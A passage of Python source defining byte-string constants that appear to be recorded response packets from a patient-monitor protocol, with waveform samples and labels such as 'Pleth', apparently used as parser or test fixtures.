b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x20\x00\x20\x00\x20\x00\x20\x00\x1f\xff\x1f\xff\x1f\xff" \ b"\x20\x00\x1f\xff\x1f\xff\x1f\xfe\x1f\xfd\x1f\xfc\x1f\xfa\x1f\xf9" \ b"\x1f\xf9\x1f\xf9\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7" \ b"\x1f\xf6\x1f\xf5\x1f\xf6\x1f\xf5\x1f\xf6\x1f\xf5\x1f\xf6\x1f\xf5" \ b"\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf2" \ b"\x1f\xf3\x1f\xf2\x1f\xf3\x1f\xf2\x1f\xf3\x1f\xf2\x1f\xf3\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf5\x1f\xf5\x1f\xf6\x1f\xf5\x1f\xf5\x1f\xf6" \ b"\x1f\xf7\x1f\xf7\x1f\xf8\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf9\x1f\xf9" \ b"\x1f\xf8\x1f\xf9\x1f\xf9\x1f\xfa\x1f\xfb\x1f\xfb\x1f\xfc\x1f\xfb" \ b"\x1f\xfc\x1f\xfc\x1f\xfd\x1f\xfc\x1f\xfd\x1f\xfe\x1f\xfd\x1f\xfd" \ b"\x1f\xfe\x1f\xfe\x1f\xfd\x1f\xfc\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf1\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xed\x1f\xed\x1f\xeb\x1f\xeb\x1f\xe9\x1f\xe9" \ b"\x1f\xe9\x1f\xe7\x1f\xe7\x1f\xe5\x1f\xe5\x1f\xe3\x1f\xe3\x1f\xe5" \ b"\x1f\xe3\x1f\xe3\x1f\xe1\x1f\xe1\x1f\xdf\x1f\xdf\x1f\xdd\x1f\xdb" \ b"\x1f\xdb\x1f\xdb\x1f\xdb\x1f\xdd\x1f\xdd\x1f\xdf\x1f\xe1\x1f\xe1" \ b"\x1f\xe1\x1f\xe3\x1f\xe3\x1f\xe5\x1f\xe7\x1f\xe7\x1f\xe7\x1f\xe9" \ b"\x1f\xeb\x1f\xeb\x1f\xed\x1f\xed\x1f\xed\x1f\xef\x1f\xef\x1f\xf1" \ b"\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf7\x1f\xf9" \ b"\x1f\xf9\x1f\xfb\x1f\xfd\x1f\xff\x1f\xfd\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x07\x8e\x00\x0d\x00\xe0\x09\x21\x00\x02\x07\x8e\x09\x2f" \ b"\x00\x04\x00\x01\x00\x09\x09\x3f\x00\x0c\x00\x00\x08\x00\x00\x01" \ b"\x42\x80\x00\x00\x00\x00\x09\x6d\x00\x06\x00\x20\x10\x0c\x80\x00" \ b"\x09\x8d\x00\x04\x00\x00\x00\x40\x09\x24\x00\x04\x00\x02\x4b\xb4" \ b"\x09\x27\x00\x10\x00\x0e\x00\x50\x00\x6c\x00\x65\x00\x74\x00\x68" \ b"\x00\x20\x00\x00\x09\x96\x00\x02\x02\x00\x09\x11\x00\x02\x00\x06" \ b"\x09\x40\x00\x02\x00\x00\x09\x6f\x00\x0c\x00\x7f\xff\xff\x00\x7f" \ b"\xff\xff\x00\x00\x0f\xff\x09\x1a\x00\x24\x00\x04\x00\x20\x00\x7f" \ b"\xff\xff\x04\x00\x00\x00\x00\x7f\xff\xff\x06\x00\x00\x01\x00\x7f" \ b"\xff\xff\x0a\x00\x00\x01\x00\x7f\xff\xff\x0c\x00\x00\x00\x09\x6e" \ b"\x00\x46\x4b\xb4\x04\x00\x00\x40\x06\x1f\x06\x1d\x06\x1a\x06\x15" \ b"\x06\x0e\x06\x05\x05\xfb\x05\xef\x05\xe0\x05\xd0\x05\xbe\x05\xab" \ b"\x05\x95\x05\x7f\x05\x66\x05\x4d\x05\x33\x05\x18\x04\xfc\x04\xe1" \ b"\x04\xc6\x04\xab\x04\x91\x04\x78\x04\x60\x04\x4b\x04\x37\x04\x26" \ b"\x04\x18\x04\x0d\x04\x05\x04\x01" rsp_wave_6_no_2 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x01\x0e\x80\x28\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x04\x00\x04\x04\x04\x0b\x04\x18\x04\x28\x04\x3e\x04\x57" \ b"\x04\x76\x04\x99\x04\xc0\x04\xec\x05\x1d\x05\x51\x05\x89\x05\xc5" \ b"\x06\x05\x06\x47\x06\x8c\x06\xd3\x07\x1c\x07\x67\x07\xb3\x07\xff" \ b"\x08\x4c\x08\xbe\x09\x09\x09\x53\x09\xbf\x0a\x03\x0a\x44\x0a\x83" \ b"\x0a\xd8" rsp_wave_6_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x02\x0e\x80\x30\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\xa1\x94\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xff\x20\x04\x20\x0c" \ b"\x20\x14\x20\x1c\x20\x26\x20\x2f\x20\x38\x20\x42\x20\x4b\x20\x55" \ b"\x20\x5e\x20\x68\x20\x71\x20\x7a\x20\x83\x20\x8d\x20\x96\x20\x9f" \ b"\x20\xa8\x20\xad\x20\xab\x20\xa6\x20\x9e\x20\x95\x20\x8c\x20\x82" \ b"\x20\x78\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\xa0\x84\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfe\x20\x00" \ b"\x20\x02\x20\x06\x20\x08\x20\x0b\x20\x0e\x20\x10\x20\x13\x20\x17" \ b"\x20\x18\x20\x1a\x20\x1d\x20\x20\x20\x23\x20\x25\x20\x28\x20\x2b" \ b"\x20\x2e\x20\x31\x20\x33\x20\x30\x20\x30\x20\x2d\x20\x2a\x20\x28" \ b"\x20\x26\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\xa1\x04\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x20\x01\x20\x05\x20\x0b" \ b"\x20\x11\x20\x15\x20\x1d\x20\x23\x20\x29\x20\x31\x20\x37\x20\x3d" \ b"\x20\x45\x20\x4d\x20\x53\x20\x59\x20\x5f\x20\x67\x20\x6d\x20\x73" \ b"\x20\x79\x20\x7b\x20\x77\x20\x75\x20\x6d\x20\x67\x20\x61\x20\x59" \ b"\x20\x51\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x0b\x0c\x0b\x3c\x0b\x8d\x0b\xae\x0b\xc9\x0b\xef\x0b\xfa" \ b"\x0b\xff\x0b\xfc\x0b\xf3\x0b\xe5\x0b\xd2\x0b\xba\x0b\x9d\x0b\x7b" \ b"\x0b\x56\x0b\x2c\x0b\x00\x0a\xd0\x0a\x9d\x0a\x68\x0a\x31\x09\xf9" \ b"\x09\xbf\x09\x85\x09\x4b\x09\x10\x08\xd7\x08\x9e\x08\x66\x08\x30" \ b"\x07\xfb" rsp_wave_6_no_4 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x03\x0e\x80\x38\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x20\x6e\x20\x63\x20\x59\x20\x4f\x20\x45\x20\x3a\x20\x30" \ b"\x20\x26\x20\x1c\x20\x12\x20\x08\x1f\xff\x1f\xf7\x1f\xf3\x1f\xf0" \ b"\x1f\xee\x1f\xed\x1f\xed\x1f\xec\x1f\xec\x1f\xed\x1f\xed\x1f\xed" \ b"\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xee\x1f\xee" \ b"\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf4\x1f\xf3\x1f\xf3\x1f\xf2" \ b"\x1f\xf1\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x20\x22\x20\x1f\x20\x1d\x20\x19\x20\x17\x20\x14\x20\x12" \ b"\x20\x0e\x20\x0c\x20\x0a\x20\x06\x20\x03\x20\x01\x1f\xff\x1f\xfe" \ b"\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xff\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x20\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x20\x01\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00" \ b"\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00" \ b"\x20\x00\x1f\xff\x1f\xff\x1f\xff\x20\x00\x1f\xff\x1f\xff\x1f\xfe" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x20\x4b\x20\x43\x20\x3b\x20\x35\x20\x2d\x20\x25\x20\x1d" \ b"\x20\x17\x20\x0f\x20\x07\x20\x01\x1f\xfb\x1f\xf5\x1f\xf3\x1f\xf1" \ b"\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xf1\x1f\xf1\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x07\xc9\x07\x99\x07\x6b\x07\x40\x07\x18\x06\xf3\x06\xd2" \ b"\x06\xb3\x06\x97\x06\x7f\x06\x69\x06\x57\x06\x47\x06\x3a\x06\x2f" \ b"\x06\x27\x06\x21\x06\x1d\x06\x1a\x06\x19\x06\x19\x06\x1a\x06\x1b" \ b"\x06\x1d\x06\x1e\x06\x20\x06\x20\x06\x20\x06\x1f\x06\x1d\x06\x1a" \ b"\x06\x15" rsp_nu_7_no_1 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x04\x1c\x01\x01\x00\x01\x00\x07\x04\x14\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x04\x0a\x00\x01\x00\x00\x0e\x80\x6f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x03\xf0\x00\x00" \ b"\x00\x0a\x03\xea\x86\x3f\x00\x07\x00\x46\x09\x21\x00\x02\x86\x3f" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x58\x04" \ b"\x09\x27\x00\x10\x00\x0e\x00\x43\x00\x50\x00\x50\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x05" \ 